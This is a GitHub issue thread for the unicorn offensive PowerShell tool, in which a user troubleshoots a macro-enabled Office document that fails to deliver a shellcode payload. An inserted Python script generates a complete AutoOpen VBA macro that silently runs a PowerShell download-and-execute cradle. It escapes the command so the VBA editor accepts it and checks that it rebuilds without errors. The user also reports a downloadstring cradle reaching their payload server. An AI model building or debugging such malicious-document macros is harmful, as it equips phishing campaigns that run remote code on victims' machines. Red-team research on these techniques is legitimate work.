trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory. Based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at DEF CON 18.
https://www.trustedsec.com

Formatting troubles with Word/Excel VBA editor #147

Closed 07am closed 4 years ago

07am commented 4 years ago

Hello, I'm using Office 2016 Plus to create my macro-enabled docs and I seem to be having trouble formatting the script block to run.

I've noticed the editor automatically tries to add double quotes that are not present in the source: immediately after "...as unicorn second stage" and in another section, "actual unicorn payload".

I've tried escaping around the text or truncating unnecessary stuff and I got it to produce the -219 error block but no callback.

Payload and infrastructure are verified correct. Defender is turned off for this portion of the test.

Anyone have a workaround or ideas for this?

[Screenshot from 2020-06-16 20-29-01]
[Screenshot from 2020-06-16 20-29-44]
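The quoting trouble described above comes down to how VBA string literals work: VBA has no backslash escape, an embedded double quote must be written as two double quotes (""), and the editor caps a physical line at 1023 characters, so a long PowerShell command has to be rebuilt from chunked `x = x & "..."` statements. The following Python is an added example, not unicorn's own generator and not the issue author's macro. All names (`vba_chunked_assignments`, `vba_eval_string`, `build_macro`) are assumed, and `SAMPLE_CMD` is a constructed command with a placeholder loopback URL. It emits the chunked statements, checks the line limit, and then evaluates the statements the way VBA would, so a literal that was mangled (a stray undoubled quote, for instance) is caught before the document is ever opened.

```python
"""Added example: encode a long PowerShell command as VBA string statements
and round-trip check the result.  Not code from unicorn or the issue author."""
import re

VBA_MAX_LINE_LEN = 1023  # the VBA editor rejects physical lines longer than this

# Constructed sample command; the URL is a loopback placeholder, not a real stager.
SAMPLE_CMD = ('powershell -w hidden -nop -c '
              '"IEX (New-Object Net.WebClient).DownloadString(\'http://127.0.0.1:8080/stage\')"')


def vba_escape(text: str) -> str:
    """Return text as the body of a VBA string literal: every " becomes ""."""
    return text.replace('"', '""')


def vba_chunked_assignments(var: str, text: str, chunk: int = 200) -> list:
    """Emit VBA statements that rebuild `text` in `var`, one chunk at a time.

    The raw text is cut first and escaped afterwards, so a doubled quote is
    never split across two statements (which is exactly the kind of breakage
    that shows up as 'extra' quotes in the editor).
    """
    lines = [f'{var} = ""']
    for i in range(0, len(text), chunk):
        lines.append(f'{var} = {var} & "{vba_escape(text[i:i + chunk])}"')
    return lines


def check_vba_line_limits(lines: list) -> bool:
    """True if every physical line fits within the VBA editor's limit."""
    return all(len(line) <= VBA_MAX_LINE_LEN for line in lines)


# Assumed grammar for the statements this script itself emits:  var = ["]...["]
# or  var = var & "..."  where the literal body may only contain "" as a quote.
_ASSIGN = re.compile(r'^(\w+) = (\1 & )?"((?:[^"]|"")*)"$')


def vba_eval_string(lines: list, var: str) -> str:
    """Evaluate the chunked statements the way VBA would (undoing "" -> ").

    Raises ValueError on any line that is not a well-formed literal, which is
    the check the screenshots in this thread are trying to do by eye.
    """
    value = ""
    for line in lines:
        m = _ASSIGN.match(line)
        if not m or m.group(1) != var:
            raise ValueError(f"malformed VBA string statement: {line!r}")
        body = m.group(3).replace('""', '"')
        value = value + body if m.group(2) else body
    return value


def build_macro(cmd: str, var: str = "x", chunk: int = 200) -> str:
    """Return a complete AutoOpen macro whose string `var` evaluates to `cmd`."""
    lines = vba_chunked_assignments(var, cmd, chunk)
    if not check_vba_line_limits(lines):
        raise ValueError("a generated line exceeds the VBA line limit")
    if vba_eval_string(lines, var) != cmd:
        raise ValueError("round-trip mismatch: generated VBA does not rebuild cmd")
    body = "\n".join("    " + line for line in lines)
    return (f"Sub AutoOpen()\n    Dim {var} As String\n{body}\n"
            f"    Shell {var}, vbHide\nEnd Sub\n")


if __name__ == "__main__":
    # Small chunk size so the quote-doubling and chunk boundaries are visible.
    print(build_macro(SAMPLE_CMD, chunk=40))
```

Paste the printed macro into the VBA editor as-is; if the editor still rewrites any line, diff its version of the `x = x & "..."` statements against the generated ones and feed the editor's copy back through `vba_eval_string` to see where the string diverges from the intended command.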

07am commented 4 years ago

Digging deeper, I've tried just running the decoded version in PowerShell and it seems to be kicking back the error "Cannot process the XML from the "Error" stream of : Root element is missing."

I've also tried replacing the obfuscated PowerShell commands with a simple iex(new-object net.webclient).downloadstring('blahblah') and got the macro to fire and hit my payload server (though it didn't produce a shell, nor did Defender go off).

[Screenshot: decoded-run]
[Screenshot from 2020-06-16 22-52-30]